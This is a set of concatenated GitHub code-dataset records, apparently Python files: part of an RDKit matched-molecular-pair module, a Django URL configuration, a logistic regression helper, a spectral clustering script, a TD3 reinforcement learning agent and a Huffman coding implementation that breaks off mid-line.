Chem.MolFromSmiles(from_smiles)\n to_mol = Chem.MolFromSmiles(rule.to_smiles)\n fragment_mapping = mcs_match_fragments(from_mol, to_mol)\n query_mapping, _ = list(zip(*fragment_mapping)) if fragment_mapping else [(), ()]\n query_missing = [atom.GetIdx() for atom in mapped_query_mol.GetAtoms()\n if\n atom.HasProp('variableNo') and atom.GetIntProp(\n 'variableNo') not in query_mapping]\n for atom in from_mol.GetAtoms():\n if atom.GetAtomicNum() == 0 and atom.GetIdx() not in query_mapping:\n cut_no = atom.GetAtomMapNum()\n wildcard_match = _atom_matching_wildcard(mapped_query_mol, cut_no)\n query_missing.append(wildcard_match)\n\n for missing_idx in query_missing:\n mapped_query_mol.GetAtomWithIdx(missing_idx).SetBoolProp('missing', True)\n\n # find missing atoms in original query\n reference_missing = map_labelled_atoms_to_reference(query, mapped_query_mol)\n\n # this removes annoying substructure highlighting in IPythonConsole\n # (which monkey patches substructure search)\n if hasattr(mapped_product_mol, '__sssAtoms'):\n delattr(mapped_product_mol, '__sssAtoms')\n if hasattr(mapped_query_mol, '__sssAtoms'):\n setattr(mapped_query_mol, '__sssAtoms', query_missing)\n\n last_from_smiles = from_smiles\n last_constant_smiles = rule.constant_smiles\n last_to_smiles = rule.to_smiles\n\n transform_product = MmpTransformProduct(from_smiles=from_smiles, to_smiles=rule.to_smiles,\n n_pairs=rule.count, reversed=reversed, radius=rule.radius,\n value=rule.avg, rule_environment_id=rule.rule_environment_id,\n query=mapped_query_mol,\n product=mapped_product_mol,\n constant_smiles=rule.constant_smiles,\n query_reference_missing=reference_missing)\n transform_products.append(transform_product)\n\n if has_product_with_rule:\n product = MmpProduct(query=query, product=product_smiles, transform_products=transform_products)\n products.append(product)\n return MmpTransform(query=query, property_names=properties, products=products, property_ids=property_ids)\n\n\ndef environment_rule_pairs(rule_environment_id: int, reverse: bool, property_name, database_file: str) \\\n -> MmpEnvironment:\n \"\"\"\n Recover the database of molecule pairs that are used for an environment rule\n\n :param rule_environment_id:\n :param reverse:\n :param property_name:\n :param database_file:\n :return:\n \"\"\"\n db = open_database(database_file)\n cursor = db.get_cursor()\n\n query = 'select compound1_id, compound2_id from pair where rule_environment_id = ?'\n cursor.execute(query, [rule_environment_id])\n pairs = []\n for compound1_id, compound2_id in cursor.fetchall():\n if reverse:\n compound1_id, compound2_id = compound2_id, compound1_id\n\n query = \"\"\" select public_id, clean_smiles, value \n from compound c, compound_property cp, property_name pn\n where c.id = ?\n and pn.name = ?\n and c.id = cp.compound_id \n and cp.property_name_id = pn.id\"\"\"\n cursor.execute(query, (compound1_id, property_name))\n (compound1_name, compound1_smiles, compound1_value) = cursor.fetchone()\n cursor.execute(query, (compound2_id, property_name))\n (compound2_name, compound2_smiles, compound2_value) = cursor.fetchone()\n pair = MmpPair(from_id=compound1_name, from_smiles=compound1_smiles, from_property=compound1_value,\n to_id=compound2_name, to_smiles=compound2_smiles, to_property=compound2_value)\n pairs.append(pair)\n\n return MmpEnvironment(pairs=pairs)\n\n\ndef _atom_has_cut_no(atom: Atom, cut_no: int) -> bool:\n \"\"\"\n Return true if this atom is labelled with the cut point\n\n :param atom:\n :param cut_no:\n :return:\n \"\"\"\n prop = 'cutNo{}'.format(cut_no)\n if atom.HasProp(prop) and atom.GetBoolProp(prop):\n return True\n return False\n\n\ndef _bond_idx_for_cut(mol: Mol, cut_no: int) -> int:\n \"\"\"\n Find the bond index for a given cut\n\n :param mol:\n :param cut_no:\n :return:\n \"\"\"\n for atom in mol.GetAtoms():\n if _atom_has_cut_no(atom, cut_no):\n for neighbor in atom.GetNeighbors():\n if _atom_has_cut_no(neighbor, cut_no):\n bond = mol.GetBondBetweenAtoms(atom.GetIdx(), neighbor.GetIdx())\n return bond.GetIdx()\n raise RuntimeError('Unable to find neighbor atom in cut')\n raise ValueError('Unable to find cut {} in molecule'.format(cut_no))\n\n\ndef _atom_matching_wildcard(mol: Mol, cut_no: int) -> int:\n \"\"\"\n Find the index of the atom in a combined molecule that matches the transform dummy atom for the given\n cut (this the the atom in the constant part of the molecule that matches the cut)\n\n :param mol:\n :param cut_no:\n :return:\n \"\"\"\n return next(atom.GetIdx() for atom in mol.GetAtoms()\n if _atom_has_cut_no(atom, cut_no) and not atom.GetBoolProp('variable'))\n\n\ndef add_attachment_order_to_smiles(smiles: str, attachment_order: Optional[List[int]] = None) -> str:\n \"\"\"\n Adds the specified mapping numbers to the transform smiles\n\n :param smiles:\n :param attachment_order:\n :return:\n \"\"\"\n mol = Chem.MolFromSmiles(smiles)\n atoms = [a for a in mol.GetAtoms() if a.GetAtomicNum() == 0]\n if not attachment_order:\n attachment_order = range(len(atoms))\n assert (len(atoms) == len(attachment_order))\n for attachment_no, atom in zip(attachment_order, atoms):\n atom.SetIntProp('molAtomMapNumber', attachment_no + 1)\n return Chem.MolToSmiles(mol, True)\n\n\ndef database_property_names(database_file: str) -> List[str]:\n \"\"\"\n Returns all the property names for a MMPDB database\n\n :param database_file:\n :return:\n \"\"\"\n dbinfo = DBFile(database_file)\n database = dbinfo.open_database()\n dataset = database.get_dataset()\n return dataset.get_property_names()\n","repo_name":"Glysade/DataFxnPylib","sub_path":"pylib_3.9.7/ruse/rdkit/mmp.py","file_name":"mmp.py","file_ext":"py","file_size_in_byte":37769,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69850418408","text":"\"\"\"hyperjob URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom vacancy.views import IndexView, VacanciesView, MySignupView, MyLoginView, HomeView, NewVacancyView\nfrom resume.views import ResumesView, NewResumeView\nfrom django.views.generic import RedirectView\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path(\"\", IndexView.as_view()),\n path(\"vacancies\", VacanciesView.as_view()),\n path(\"resumes\", ResumesView.as_view()),\n path(\"signup\", MySignupView.as_view()),\n path(\"login\", MyLoginView.as_view()),\n path('login/', RedirectView.as_view(url='/login')),\n path('signup/', RedirectView.as_view(url='/signup')),\n path('resumes/', RedirectView.as_view(url='/resumes')),\n path('vacancies/', RedirectView.as_view(url='/vacancies')),\n path(\"home\", HomeView.as_view()),\n path('home/', RedirectView.as_view(url='/home')),\n path(\"vacancy/new\", NewVacancyView.as_view()),\n path('vacancy/new/', RedirectView.as_view(url='/vacancy/new')),\n path(\"resume/new\", NewResumeView.as_view()),\n path('resume/new/', RedirectView.as_view(url='/resume/new')),\n]\n","repo_name":"carlokruger/hyperjob","sub_path":"hyperjob/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10116671743","text":"from sklearn.metrics import roc_auc_score\nfrom sklearn.linear_model import LogisticRegression\n\ndef train_model(train_data):\n features = ['height','weight','age', 'aids', 'cirrhosis', 'hepatic_failure', 'immunosuppression', 'leukemia', 'lymphoma', 'solid_tumor_with_metastasis']\n target = 'diabetes_mellitus'\n \n X_train = train_data[features]\n y_train = train_data[target]\n \n model = LogisticRegression()\n model.fit(X_train, y_train)\n \n return model\n\ndef predict_and_evaluate(model, train_data, test_data):\n X_train = train_data[['height','weight', 'age', 'aids', 'cirrhosis', 'hepatic_failure', 'immunosuppression', 'leukemia', 'lymphoma', 'solid_tumor_with_metastasis']]\n X_test = test_data[['height','weight', 'age', 'aids', 'cirrhosis', 'hepatic_failure', 'immunosuppression', 'leukemia', 'lymphoma', 'solid_tumor_with_metastasis']]\n \n train_preds = model.predict_proba(X_train)[:, 1]\n test_preds = model.predict_proba(X_test)[:, 1]\n \n train_roc_auc = roc_auc_score(train_data['diabetes_mellitus'], train_preds)\n test_roc_auc = roc_auc_score(test_data['diabetes_mellitus'], test_preds)\n \n train_data['predictions'] = train_preds\n test_data['predictions'] = test_preds\n \n return train_data, test_data, train_roc_auc, test_roc_auc\n\n","repo_name":"AlvaroOrtiz2001/HW3-Computing-for-Data-Science","sub_path":"analysis/my_library/processing_data_lib/modeling.py","file_name":"modeling.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14242295156","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport math\r\nfrom scipy.spatial import distance\r\nimport scipy.cluster.hierarchy as shc\r\nfrom sklearn.cluster import KMeans, AgglomerativeClustering, SpectralClustering\r\nfrom sklearn import metrics\r\nfrom sklearn.metrics import classification_report, confusion_matrix\r\nfrom numpy import linalg as LA\r\nfrom scipy.sparse import csgraph\r\n\r\n\r\n \r\ndef readDataSpam(filename):\r\n infile = open(filename)\r\n data = infile.readlines()\r\n for i in range(len(data)):\r\n data[i] = data[i].split(\",\")\r\n for j in range(len(data[i])):\r\n data[i][j] = float(data[i][j])\r\n \r\n return data\r\n\r\ndef readDataOcc(filename):\r\n infile = open(filename)\r\n data = infile.readlines()\r\n data = data[1:]\r\n for i in range(len(data)):\r\n data[i] = data[i].split(\",\")\r\n del data[i][0]\r\n del data[i][0]\r\n for j in range(len(data[i])):\r\n data[i][j] = float(data[i][j])\r\n \r\n return data\r\n\r\n\r\n\r\nspamData = readDataSpam(\"spambase.data\")\r\noccData = readDataOcc(\"datatest.txt\")\r\nrightSpamData = []\r\nrightOccData = []\r\nfor i in range(len(spamData)):\r\n rightSpamData.append(spamData[i][len(spamData[i])-1])\r\n spamData[i] = spamData[i][:len(spamData[i])-1]\r\n \r\nfor i in range(len(occData)):\r\n rightOccData.append(occData[i][len(occData[i])-1])\r\n occData[i] = occData[i][:len(occData[i])-1]\r\n \r\n\r\ndef normalize(dataset):\r\n array = dataset\r\n temp = np.amax(dataset, axis =0)\r\n temp = temp.tolist()\r\n for i in range(0, len(array)):\r\n for j in range(0, len(array[i])):\r\n array[i][j] = np.around(array[i][j] / temp[j], decimals =5)\r\n return array\r\n\r\nspamDataNorm = normalize(spamData)\r\noccDataNorm = normalize(occData)\r\n\r\ndef eigenDecomposition(AffMatrix, plot = False):\r\n # Compute Laplacian matrix, L = D - A\r\n L = csgraph.laplacian(AffMatrix)\r\n # Compute eigenvalues from |L- uI| = 0 and eigenvectors from Lx = ux\r\n eigenvalues, eigenvectors = LA.eigh(L)\r\n\r\n # A plot for the eigenvalues of the affinity matrix\r\n if plot:\r\n plt.figure(figsize=(14, 6))\r\n plt.title(\"Largest eigenvalues of input matrix\")\r\n plt.scatter(np.range(np.round(eigenvalues, decimals = 2)), np.round((eigenvalues), decimals = 2))\r\n plt.grid()\r\n plt.show()\r\n print(np.round((eigenvalues), decimals = 2))\r\n # Compute the largest eigengap\r\n index_largest_gap = np.argmax(np.diff(np.round((eigenvalues), decimals = 2)))\r\n print(index_largest_gap)\r\n # Find the optimal number of clusters from the maximum eigengap\r\n nb_clusters = index_largest_gap + 2\r\n return nb_clusters, eigenvalues, eigenvectors\r\n\r\ndef SpectralClusteringFunc(K, dataset, rightdataset):\r\n cluster = SpectralClustering(n_clusters=K, affinity = 'cosine')\r\n cluster.fit(dataset)\r\n #print(cluster.labels_)\r\n \r\n \r\n affinity_matrix = cluster.affinity_matrix_\r\n k, _, _ = eigenDecomposition(affinity_matrix)\r\n print(f'Optimal number of clusters are: {k}')\r\n \r\n \r\n contingency_matrix = metrics.cluster.contingency_matrix(rightdataset, cluster.labels_)\r\n purity = np.sum(np.amax(contingency_matrix, axis=0)) / len(dataset)\r\n print(\"Purity for %d Clusters is: %f\" % (K, purity))\r\n\r\n # Gia thn pleiopsifia se kathe cluster\r\n clustersCategories = []\r\n for i in range(K):\r\n\r\n if contingency_matrix[0][i] > contingency_matrix[1][i]:\r\n clustersCategories.append(0)\r\n else:\r\n clustersCategories.append(1)\r\n\r\n # Gia to F-Measure\r\n TotalFMeasure = 0\r\n for i in range(K): # Gia kathe K\r\n TruePositive = 0\r\n TrueNegative = 0\r\n FalsePositive = 0\r\n FalseNegative = 0\r\n for j in range(len(dataset)): # Gia kathe paradeigma\r\n label = cluster.labels_[j] # Krata to label tou paradeigmatos sumfwna me ton kmeans\r\n if (label != i): # an den einai idio me to cluster pou eksetazoume\r\n continue\r\n else: # an einai idio\r\n if rightdataset[j] == clustersCategories[label] and clustersCategories[label] == 1:\r\n TruePositive = TruePositive + 1\r\n elif rightdataset[j] == clustersCategories[label] and clustersCategories[label] == 0:\r\n TrueNegative = TrueNegative + 1\r\n elif rightdataset[j] != clustersCategories[label] and clustersCategories[label] == 1:\r\n FalsePositive = FalsePositive + 1\r\n elif rightdataset[j] != clustersCategories[label] and clustersCategories[label] == 0:\r\n FalseNegative = FalseNegative + 1\r\n\r\n if TruePositive != 0 and FalsePositive != 0:\r\n precision = TruePositive / (TruePositive + FalsePositive)\r\n recall = TruePositive / (TruePositive + FalseNegative)\r\n F1 = 2 / ((1 / precision) + (1 / recall))\r\n else:\r\n precision = 0\r\n recall = 0\r\n F1 = 0\r\n\r\n TotalFMeasure = TotalFMeasure + F1\r\n print(\"Total F-Measure for %d Clusters is: %f\" % (K, TotalFMeasure))\r\n\r\nprint(\"Spectral Clustering for Spambase Data:\")\r\nSpectralClusteringFunc(4600, spamDataNorm, rightSpamData)\r\nprint(\"\\n\")\r\nprint(\"Spectral Clustering for Occupancy Data:\")\r\n#SpectralClusteringFunc(31, occDataNorm, rightOccData)\r\n\r\n","repo_name":"GeoKrom/UoI-Pattern-Recognition-course","sub_path":"Clustering Algorithms/SpectralClustering.py","file_name":"SpectralClustering.py","file_ext":"py","file_size_in_byte":5371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75257188648","text":"import copy\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nimport utils\nimport tracker\nimport time\n\n# Implementation of Twin Delayed Deep Deterministic Policy Gradients (TD3)\n# Paper: https://arxiv.org/abs/1802.09477\n\n\nclass Actor(nn.Module):\n def __init__(self,\n state_dim,\n action_dim,\n max_action,\n pi : list = [400, 300],\n activation_fn: str = \"relu\",\n device: str = \"cuda\"\n ):\n\n super(Actor, self).__init__()\n self.device = device\n self.pi = nn.Sequential()\n in_size = state_dim\n for layer_sz in pi:\n self.pi.append(nn.Linear(in_size, layer_sz))\n in_size = layer_sz\n self.pi.append(nn.Linear(in_size, action_dim))\n self.max_action = max_action\n\n if activation_fn == \"relu\":\n self.activation_fn = F.relu\n elif activation_fn == \"tanh\":\n self.activation_fn == nn.Tanh\n\n def forward(self, state):\n x = state\n for i in range(len(self.pi)-1):\n x = self.activation_fn(self.pi[i](x))\n return self.max_action * torch.tanh(self.pi[-1](x))\n\n def select_action(self, state):\n state = torch.FloatTensor(state.reshape(1, -1)).to(self.device)\n return self.forward(state).cpu().data.numpy().flatten()\n\nclass Critic(nn.Module):\n def __init__(self,\n state_dim,\n action_dim,\n qf : list = [400, 300],\n activation_fn: str = \"relu\"\n ):\n super(Critic, self).__init__()\n\n if activation_fn == \"relu\":\n self.activation_fn = F.relu\n elif activation_fn == \"tanh\":\n self.activation_fn == nn.Tanh\n\n # Q1 architecture\n self.qf1 = nn.Sequential()\n in_size = state_dim + action_dim\n for layer_sz in qf:\n self.qf1.append(nn.Linear(in_size, layer_sz))\n in_size = layer_sz\n self.qf1.append(nn.Linear(in_size, 1))\n\n # Q2 architecture\n self.qf2 = nn.Sequential()\n in_size = state_dim + action_dim\n for layer_sz in qf:\n self.qf2.append(nn.Linear(in_size, layer_sz))\n in_size = layer_sz\n self.qf2.append(nn.Linear(in_size, 1))\n\n def forward(self, state, action):\n sa = torch.cat([state, action], 1)\n\n q1 = sa\n for i in range(len(self.qf1)-1):\n q1 = self.activation_fn(self.qf1[i](q1))\n q1 = self.qf1[-1](q1)\n\n q2 = sa\n for i in range(len(self.qf2)-1):\n q2 = self.activation_fn(self.qf2[i](q2))\n q2 = self.qf2[-1](q2)\n\n return q1, q2\n\n\n def Q1(self, state, action):\n sa = torch.cat([state, action], 1)\n\n q1 = sa\n for i in range(len(self.qf1)-1):\n q1 = self.activation_fn(self.qf1[i](q1))\n q1 = self.qf1[-1](q1)\n return q1\n\nclass TD3(object):\n def __init__(\n self,\n max_action,\n hyperparameters,\n train_env,\n device:str = \"cpu\",\n early_stopping:int = 100_000,\n state_dim:int = 23, # used when a training environment is not supplied\n action_dim:int = 3, # used when a training environment is not supplied\n verbose: int = 0\n ):\n self.device=device\n if device == \"cuda\":\n self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n else:\n self.device = torch.device(\"cpu\")\n\n if verbose == 1:\n print(f\"Model TD3 is configured to device {self.device}\")\n\n self.train_env = train_env\n\n if self.train_env is not None:\n state_dim = self.train_env.agents[0].get_observation_space_shape()\n action_dim = self.train_env.agents[0].action_space.shape[0]\n\n self.actor = Actor(state_dim,\n action_dim, max_action,\n hyperparameters[\"net_arch\"][\"pi\"],\n hyperparameters[\"activation_fn\"],\n device=device).to(self.device)\n self.actor_target = copy.deepcopy(self.actor)\n self.actor_optimizer = torch.optim.Adam(self.actor.parameters(),\n lr=hyperparameters[\"learning_rate\"])\n\n self.critic = Critic(state_dim,\n action_dim,\n hyperparameters[\"net_arch\"][\"qf\"],\n hyperparameters[\"activation_fn\"]).to(self.device)\n self.critic_target = copy.deepcopy(self.critic)\n self.critic_optimizer = torch.optim.Adam(self.critic.parameters(),\n lr=hyperparameters[\"learning_rate\"])\n\n self.max_action = max_action\n self.buffer_size = hyperparameters[\"buffer_size\"]\n self.discount = hyperparameters[\"gamma\"]\n self.tau = hyperparameters[\"tau\"]\n self.batch_size = hyperparameters[\"batch_size\"]\n self.policy_noise = hyperparameters[\"policy_noise\"] * self.max_action\n self.noise_clip = hyperparameters[\"noise_clip\"] * self.max_action\n self.policy_freq = hyperparameters[\"policy_freq\"]\n\n self.replay_buffer = utils.ReplayMemory(hyperparameters[\"buffer_size\"],\n device=self.device)\n self.trackr = tracker.tracker(100)\n\n # Early stopping\n self.early_stopping = early_stopping\n self.exit = False\n\n self.total_it = 0\n\n def select_action(self, state):\n state = torch.FloatTensor(state.reshape(1, -1)).to(self.device)\n return self.actor(state).cpu().data.numpy().flatten()\n\n def train(self, replay_buffer):\n self.total_it += 1\n\n # Sample replay buffer\n state, action, next_state, reward, not_done = replay_buffer.sample(self.batch_size)\n\n with torch.no_grad():\n # Select action according to policy and add clipped noise\n noise = (\n\t\t torch.randn_like(action) * self.policy_noise).clamp(\n\t\t -self.noise_clip, self.noise_clip)\n\n next_action = (\n\t\t self.actor_target(next_state) + noise\n\t\t\t).clamp(-self.max_action, self.max_action)\n\n # Compute the target Q value\n target_Q1, target_Q2 = self.critic_target(next_state, next_action)\n target_Q = torch.min(target_Q1, target_Q2)\n target_Q = reward + not_done * self.discount * target_Q\n\n # Get current Q estimates\n current_Q1, current_Q2 = self.critic.forward(state, action)\n\n # Compute critic loss\n critic_loss = F.mse_loss(current_Q1, target_Q) + F.mse_loss(current_Q2, target_Q)\n\n # Optimize the critic\n self.critic_optimizer.zero_grad()\n critic_loss.backward()\n self.critic_optimizer.step()\n\n # Delayed policy updates\n if self.total_it % self.policy_freq == 0:\n\n # Compute actor losse\n actor_loss = -self.critic.Q1(state, self.actor(state)).mean()\n\n # Optimize the actor\n self.actor_optimizer.zero_grad()\n actor_loss.backward()\n self.actor_optimizer.step()\n\n # Update the frozen target models\n for param, target_param in zip(self.critic.parameters(),\n self.critic_target.parameters()\n ):\n target_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n for param, target_param in zip(self.actor.parameters(),\n self.actor_target.parameters()\n ):\n target_param.data.copy_(self.tau * param.data + (1 - self.tau) * target_param.data)\n\n return critic_loss.cpu().detach().numpy(), actor_loss.cpu().detach().numpy()\n\n return critic_loss.cpu().detach().numpy(), None\n\n def save(self, filename):\n torch.save(self.critic.state_dict(), filename + \"_critic\")\n torch.save(self.critic_optimizer.state_dict(),\n filename + \"_critic_optimizer\")\n\n torch.save(self.actor.state_dict(), filename + \"_actor\")\n torch.save(self.actor_optimizer.state_dict(),\n filename + \"_actor_optimizer\")\n\n def load(self, filename):\n self.critic.load_state_dict(torch.load(filename + \"_critic\"))\n self.critic_optimizer.load_state_dict(torch.load(filename + \"_critic_optimizer\"))\n self.critic_target = copy.deepcopy(self.critic)\n\n self.actor.load_state_dict(torch.load(filename + \"_actor\"))\n self.actor_optimizer.load_state_dict(torch.load(filename + \"_actor_optimizer\"))\n self.actor_target = copy.deepcopy(self.actor)\n\n def explore_for_expert_targets(self,\n reward_target_exploration_steps=25_000):\n if self.train_env is None:\n print(\"Model cannot explore because training envrionment is\\\n missing. Please reload model and supply a training envrionment.\")\n return\n\n self.done = False\n for t in range(reward_target_exploration_steps):\n obs_vec = self.train_env.step(self.actor, random=True)\n\n for indiv_obs in obs_vec:\n if indiv_obs[4] is True:\n self.done = True\n\n if self.done:\n self.train_env.reset()\n self.done = False\n \t#env.tracker.create_video()\n self.train_env.tracker.reset()\n\n self.train_env.reset()\n self.done = False\n\n def learn(self,\n timesteps,\n callback,\n start_timesteps=25_000,\n incremental_replay_buffer = None):\n\n if self.train_env is None:\n print(\"Model cannot explore because training envrionment is\\\n missing. Please reload model and supply a training envrionment.\")\n return\n\n next_update_at = self.buffer_size*2\n\n episode_reward = 0\n episode_timesteps = 0\n self.episode_num = 0\n\n callback.on_training_start()\n\n self.train_env.reset()\n self.done = False\n start_time = time.clock_gettime(time.CLOCK_REALTIME)\n\n episode_start_time = start_time\n\n for t in range(1,int(timesteps)+1):\n self.num_timesteps = t\n\n episode_timesteps += 1\n if t < start_timesteps:\n obs_vec = self.train_env.step(model=self.actor, random=True)\n else:\n obs_vec = self.train_env.step(model=self.actor, random=False)\n\n all_rewards = []\n for indiv_obs in obs_vec:\n if indiv_obs[4] is True:\n self.done = True\n all_rewards.append(indiv_obs[2])\n transition = (indiv_obs[0], indiv_obs[3], indiv_obs[1], indiv_obs[2], 1. -indiv_obs[4])\n self.replay_buffer.add(*transition)\n\n episode_reward += float(np.mean(np.array(all_rewards)))\n\n if t >= start_timesteps:\n critic_loss, actor_loss = self.train(self.replay_buffer)\n\n if self.done:\n episode_finish_time = time.clock_gettime(time.CLOCK_REALTIME)\n if t < start_timesteps:\n self.trackr.append(actor_loss=0,\n critic_loss=0,\n episode_reward=episode_reward,\n episode_length = episode_timesteps,\n episode_fps = episode_timesteps / (episode_finish_time - episode_start_time))\n else:\n self.trackr.append(actor_loss=actor_loss,\n critic_loss=critic_loss,\n episode_reward=episode_reward,\n episode_length = episode_timesteps,\n episode_fps = episode_timesteps / (episode_finish_time - episode_start_time))\n\n callback.on_step()\n if self.done:\n self.train_env.reset()\n self.done = False\n episode_reward = 0\n episode_timesteps = 0\n self.episode_num += 1\n self.train_env.tracker.reset()\n episode_start_time = time.clock_gettime(time.CLOCK_REALTIME)\n\n # Early stopping\n if self.exit is True:\n print(f\"Early stopping mechanism triggered at timestep=\\\n {self.num_timesteps} after {self.early_stopping} steps\\\n without improvement ... Learning terminated.\")\n break\n\n if incremental_replay_buffer is not None:\n if t >= next_update_at:\n if incremental_replay_buffer == \"double\":\n self.buffer_size *= 2\n next_update_at += self.buffer_size * 2\n elif incremental_replay_buffer == \"triple\":\n self.buffer_size *= 3\n next_update_at += self.buffer_size# * 3\n elif incremental_replay_buffer == \"quadruple\":\n self.buffer_size *= 4\n next_update_at += self.buffer_size# * 3\n\n old_replay_buffer = self.replay_buffer\n self.replay_buffer = utils.ReplayMemory(self.buffer_size,\n device=self.device)\n self.replay_buffer.add_content_of(old_replay_buffer)\n\n print(f\"Updated replay buffer at timestep {t};\\\n replay_buffer_size={self.buffer_size},\\\n len={self.replay_buffer.__len__()}\\\n next_update_at={next_update_at}\")\n\n callback.on_training_end()\n","repo_name":"LukeVassallo/RL_PCB","sub_path":"src/training/TD3.py","file_name":"TD3.py","file_ext":"py","file_size_in_byte":13976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35060627378","text":"import sys, os, heapq \nfrom graphviz import Digraph\n\nclass HeapNode:\n def __init__(self, char, freq):\n self.char = char\n self.freq = freq\n self.left = None\n self.right = None\n \n def __lt__(self, other):\n return self.freq < other.freq\n\n def __eq__(self, other):\n if other == None:\n return False\n if not isinstance(other, HeapNode):\n return False\n return self.freq == other.freq\n \nclass BinaryHeap:\n def __init__(self):\n self.a = []\n \n def get(self, i):\n if i >= len(self.a):\n return\n return self.a[i].freq\n \n # swapping characters and frequencies as swapping nodes\n def swap(self, i, j):\n self.a[i].char, self.a[j].char = self.a[j].char, self.a[i].char\n self.a[i].freq, self.a[j].freq = self.a[j].freq, self.a[i].freq\n \n def add(self, node):\n index_ = self.count()\n self.a.append(node)\n \n while index_ != 0:\n p = self.parent(index_)\n if self.get(p) > self.get(index_):\n self.swap(p, index_)\n index_ = p\n \n def count(self):\n return len(self.a)\n \n def isEmpty(self):\n return len(self.a) == 0\n \n def down_heap(self, i):\n a = self.a \n while True:\n m = a[i].freq\n if self.left(i) < len(a):\n m = min(m, a[self.left(i)].freq)\n if self.right(i) < len(a):\n m = min(m, a[self.right(i)].freq)\n if m == a[i].freq:\n break \n if m == a[self.left(i)].freq:\n self.swap(i, self.left(i))\n i = self.left(i)\n else: \n self.swap(i, self.right(i)) \n i = self.right(i)\n\n def remove_minimum(self): \n if len(self.a) == 0:\n return\n elif len(self.a) == 1:\n x = self.a.pop()\n return x\n x = self.a[0]\n self.a[0] = self.a.pop()\n self.down_heap(0)\n return x\n \n def left(self, i):\n return (2 * i + 1)\n\n def right(self, i):\n return (2 * i + 2)\n\n def parent(self, i):\n return ((i - 1) // 2)\n \nclass Huffman:\n \n def __init__(self, frequency_file=None):\n self.frequency_file = frequency_file\n self.heap = BinaryHeap()\n self.bit_codes = {}\n self.char_freq = []\n \n # get frequencies from generated frequency.txt file for building tree \n def get_dictionary_from_file(self, text_file):\n freq_dict = {}\n \n with open(text_file) as f:\n \n for line in f:\n if line != '\\n':\n a = line.rstrip()\n freq_dict[a[0]] = a[2:]\n else:\n # special case for new line character and its frequency\n a = f.readline()\n freq_dict[line] = a.strip()\n \n return freq_dict\n\n # Build binary min heap with chars and frequency as nodes\n def generate_min_heap(self, frequency):\n for key, val in frequency.items():\n node = HeapNode(key, int(val))\n self.heap.add(node)\n \n # get two smallest nodes in heap and create parent node of them\n # parent's frequency as sum of frequencies of two children nodes\n def make_heap_with_frequency(self):\n while self.heap.count() > 1:\n \n node1 = heapq.heappop(self.heap.a)\n node2 = heapq.heappop(self.heap.a)\n \n node = HeapNode(None, int(node1.freq) + int(node2.freq))\n node.left = node1\n node.right = node2\n \n heapq.heappush(self.heap.a, node)\n \n # generate bit codes for characters recursively\n # left traversal has a value 0, right traversal has a value 1 \n def generate_bit_codes(self, node, bit_val):\n if node == None:\n return\n \n if node.char != None:\n self.bit_codes[node.char] = bit_val\n \n self.generate_bit_codes(node.left, bit_val + \"0\")\n self.generate_bit_codes(node.right, bit_val + \"1\")\n \n # call recursive bit-code generator for each character, pass argument as root\n def bit_code_assignment(self, root):\n bit_val = \"\"\n self.generate_bit_codes(root, bit_val)\n \n # traverse the tree to get characters and frequency values\n def traverse_tree(self, root):\n if root == None:\n return\n \n l = self.traverse_tree(root.left)\n r = self.traverse_tree(root.right)\n \n if root.char != None:\n # add characters and frequency together to the list if character is in leaf node\n self.char_freq.append([root.char, root.freq])\n elif root.char == None:\n # add only frequencies to the list if characters don't exist\n self.char_freq.append([root.freq])\n \n # get whole bit values as replacing each character with its bit value\n def get_encoded_text(self, text):\n with open(text) as text_file:\n bit_vals = \"\"\n \n for line in text_file:\n for character in line:\n bit_vals += self.bit_codes[character]\n \n return bit_vals\n \n # add extra bits if the encoded text is not multiple of 8\n def padding_encoded_text(self, encoded_text):\n # subtracting remaining bits from 1 byte value to get extra number of bits\n extra_padding = 8 - len(encoded_text) % 8\n \n for _ in range(extra_padding):\n encoded_text += \"0\"\n \n # converting extra number of bits to 8 bit value and prepend to our encoded text \n encoded_text = f\"{extra_padding:08b}\" + encoded_text\n return encoded_text\n\n # convert each 8 bits to byte and add it to byte array\n def convert_bits(self, padded_encoded_text):\n if len(padded_encoded_text) % 8 != 0:\n print('Padded Encoded text Error !!!')\n sys.exit(0)\n \n byte = bytearray()\n \n for i in range(0, len(padded_encoded_text), 8):\n byte.append(int(padded_encoded_text[i:i+8], 2))\n \n return byte\n \n # decode binary file, remove padded bits and map each bit to its character\n def decode_text(self, bits_string):\n text_string = \"\"\n \n # remove padded bits and extra number of bits for making bits_string 8 bit multiple\n padded_bits = bits_string[:8]\n extra_bits = int(padded_bits, 2)\n \n bits_string = bits_string[8:len(bits_string)-extra_bits]\n \n # iterate over bits_string to find mapping characters in bit_codes and add it to text_string\n bit = \"\"\n \n for i in range(len(bits_string)):\n bit += bits_string[i]\n if bit in self.bit_codes:\n text_string += self.bit_codes[bit]\n bit = \"\"\n \n return text_string\n \n def buildTree(self):\n frequency = self.get_dictionary_from_file(self.frequency_file)\n \n self.generate_min_heap(frequency)\n \n self.make_heap_with_frequency()\n \n root = self.heap.remove_minimum()\n \n self.bit_code_assignment(root)\n \n # write generated bitcode values and tree data with frequency to files\n \n with open('tree.dat', 'w') as treeData, 